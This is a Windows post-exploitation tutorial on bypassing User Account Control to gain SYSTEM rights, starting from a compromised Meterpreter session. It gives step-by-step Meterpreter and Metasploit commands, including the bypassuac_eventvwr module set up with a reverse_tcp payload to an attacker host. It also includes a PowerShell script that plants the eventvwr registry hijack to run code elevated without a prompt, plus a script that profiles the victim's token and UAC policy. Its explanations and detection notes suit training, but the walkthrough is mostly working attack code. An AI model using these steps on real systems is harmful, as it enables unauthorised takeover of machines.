Windows Post Exploitation Bypass UAC

Windows post exploitation: bypassing User Account Control (UAC) for privilege escalation

What is UAC

User Account Control (UAC) is a mandatory access control enforcement feature introduced with Windows Vista and Windows Server 2008 and present in every later release (Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 10). Even when the logged-on user is a member of the local Administrators group, their processes run with a filtered, medium-integrity token; the full administrator token is only given to processes that are elevated, either through a consent prompt or through the auto-elevation Windows grants to some of its own signed binaries. A UAC bypass abuses that auto-elevation to obtain the full token without a prompt.

Post Exploitation

Post exploitation means the phases of an operation after the attacker has compromised a victim's system. The goal here is to go from a UAC-restricted session belonging to a local administrator to full administrator, and then SYSTEM, rights without the user being prompted.

I already have a Meterpreter session. Running the sysinfo command shows the target system information: computer name, OS, and domain or workgroup.

The getsystem command tries to elevate Meterpreter from a local administrator to the SYSTEM user. Here it fails with a priv_elevate_getsystem error: the session runs under the user's filtered, medium-integrity token, and the techniques getsystem relies on need privileges that UAC has stripped from that token.
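Before reaching for a UAC bypass it is worth confirming that UAC is really what blocked getsystem. The PowerShell below is an added example, not code from the original walkthrough; run it from the existing Meterpreter session (for example with execute -f powershell -i). It reports whether the current token is a filtered administrator token, the integrity level, and the UAC policy values, and says which way to go next. The registry path and the S-1-5-32-544 SID are real Windows values; the only assumption is an English-locale whoami, which the integrity-level parsing relies on.

```powershell
# Added example, not part of the original page. Run on the compromised host as
# the logged-on user. Explains a failed getsystem: is this token UAC-filtered,
# and is a UAC bypass the right next step?

function Get-UacContext {
    $id        = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($id)

    # Elevated = the token already carries full Administrators rights.
    $elevated = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    # S-1-5-32-544 is BUILTIN\Administrators. A UAC-filtered token still lists it,
    # but marked deny-only, which is why IsInRole() above returns $false.
    $adminMember = [bool]($id.Groups | Where-Object { $_.Value -eq 'S-1-5-32-544' })

    # The integrity label is not exposed as a group SID in .NET, so read it from
    # "whoami /groups" (assumes the English "Mandatory Label\... Mandatory Level").
    $integrity = (whoami /groups | Select-String 'Mandatory Level').Line `
                 -replace '.*\\', '' -replace '\s{2,}.*', ''

    # UAC policy. EnableLUA 0 = UAC off. ConsentPromptBehaviorAdmin 2 = "Always
    # notify", which turns off the auto-elevation that eventvwr-style bypasses use.
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $uacOn        = $pol.EnableLUA -eq 1
    $alwaysNotify = $pol.ConsentPromptBehaviorAdmin -eq 2

    $verdict = if ($elevated -or -not $uacOn) { 'Full admin token already; getsystem should work' }
               elseif (-not $adminMember)     { 'Not an administrator; a UAC bypass gains nothing, a real privesc is needed' }
               elseif ($alwaysNotify)         { 'Administrator, but UAC is at Always notify; auto-elevation bypasses will not work' }
               else                           { 'Administrator with a filtered token; a UAC bypass is the right next step' }

    [pscustomobject]@{
        User                       = $id.Name
        Elevated                   = $elevated
        AdminGroupMember           = $adminMember
        IntegrityLevel             = $integrity
        EnableLUA                  = $pol.EnableLUA
        ConsentPromptBehaviorAdmin = $pol.ConsentPromptBehaviorAdmin
        Verdict                    = $verdict
    }
}

Get-UacContext | Format-List
```

The case this tutorial is in is the last verdict: AdminGroupMember is true, Elevated is false, IntegrityLevel is Medium. If AdminGroupMember is false, no UAC bypass will help, and local_exploit_suggester output should be read for genuine privilege escalation modules instead.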


The ps command lists every process running on the target.


Next we migrate our payload into explorer.exe with the Meterpreter migrate command. Note that explorer.exe is the user's desktop shell, not a SYSTEM process: migrating into it gains no privileges, but it gives the session a long-lived host process that is less likely to be killed than the original payload.

The background command then sends the session to the background and returns us to the msfconsole prompt.


With the session in the background, we run the post/multi/recon/local_exploit_suggester module against it (set session 1, then run) to find candidate local exploits.


We see several candidate exploits; I am using the first one, bypassuac_eventvwr (exploit/windows/local/bypassuac_eventvwr). It abuses eventvwr.exe, which Windows auto-elevates, to start our payload as a high-integrity process without a UAC prompt. It requires the session user to be a member of the local Administrators group and UAC not set to "Always notify", and Microsoft fixed it in later Windows 10 builds, so it only works on older ones. Configure the module with the listener port (lport) and attacker address (lhost) for the new session and point it at the backgrounded session:

  • use exploit/windows/local/bypassuac_eventvwr
  • set payload windows/meterpreter/reverse_tcp
  • set lport 4445
  • set lhost <attacker IP>
  • set session 1
  • run
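What the module does on the host is simple enough to show directly. The PowerShell below is an added example, not the page's or the Metasploit module's own code: it plants the same registry hijack the eventvwr bypass relies on, but with a benign command that just records whoami /groups, and removes the key again whatever happens. It assumes the situation the tutorial is in (user in Administrators, medium-integrity token, UAC not at "Always notify") and a Windows build that still reads the mscfile handler from HKCU; the key path and eventvwr.exe behaviour are the documented mechanism, the proof-file name is made up for this example.

```powershell
# Added example, not from the original page. Demonstrates the mechanism behind
# exploit/windows/local/bypassuac_eventvwr with a harmless payload.
# eventvwr.exe auto-elevates, then looks up the .msc handler under
# HKCU\Software\Classes\mscfile before HKCR, so a per-user key wins and its
# command runs with the full (high-integrity) administrator token.
# Microsoft closed this in Windows 10 Creators Update (1703); on a patched
# build nothing happens and the script reports that.

$key   = 'HKCU:\Software\Classes\mscfile\shell\open\command'
$proof = Join-Path $env:TEMP 'uac_eventvwr_proof.txt'   # name chosen for this example
# Benign payload: write the groups and integrity level of whatever runs here.
$cmd   = "cmd.exe /c whoami /groups > `"$proof`""

if (Test-Path $proof) { Remove-Item $proof -Force }

try {
    # The mscfile key does not normally exist under HKCU; we create it here.
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name '(default)' -Value $cmd

    # eventvwr.exe starts elevated without a prompt and runs $cmd instead of mmc.exe.
    Start-Process -FilePath "$env:SystemRoot\System32\eventvwr.exe"

    $deadline = (Get-Date).AddSeconds(15)
    while (-not (Test-Path $proof) -and (Get-Date) -lt $deadline) {
        Start-Sleep -Milliseconds 500
    }
    Start-Sleep -Seconds 1   # let whoami finish writing
}
finally {
    # Always remove the hijack: leaving it breaks .msc files for the user and is
    # a loud indicator of compromise (the key is a well-known detection).
    Remove-Item -Path 'HKCU:\Software\Classes\mscfile' -Recurse -Force -ErrorAction SilentlyContinue
}

if (Test-Path $proof) {
    # "High Mandatory Level" here means the command ran elevated, i.e. the bypass worked.
    Get-Content $proof | Select-String 'Mandatory Level'
} else {
    'No proof file: build is patched, UAC is at Always notify, or the command was blocked.'
}
```

The Metasploit module follows the same sequence with its payload in place of the whoami command and cleans the key up afterwards; if a run is interrupted, check that HKCU\Software\Classes\mscfile is gone, because a leftover handler is both an operational footprint and an easy artefact for incident responders to find.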

The exploit opens a new, elevated Meterpreter session. Running getsystem again in that session succeeds.

To confirm which user the shell is now running as, run the getuid (get user identity) command.

It reports NT AUTHORITY\SYSTEM. That is the LocalSystem account, which has more rights on the machine than any member of the Administrators group; it is not the Administrator user account itself.
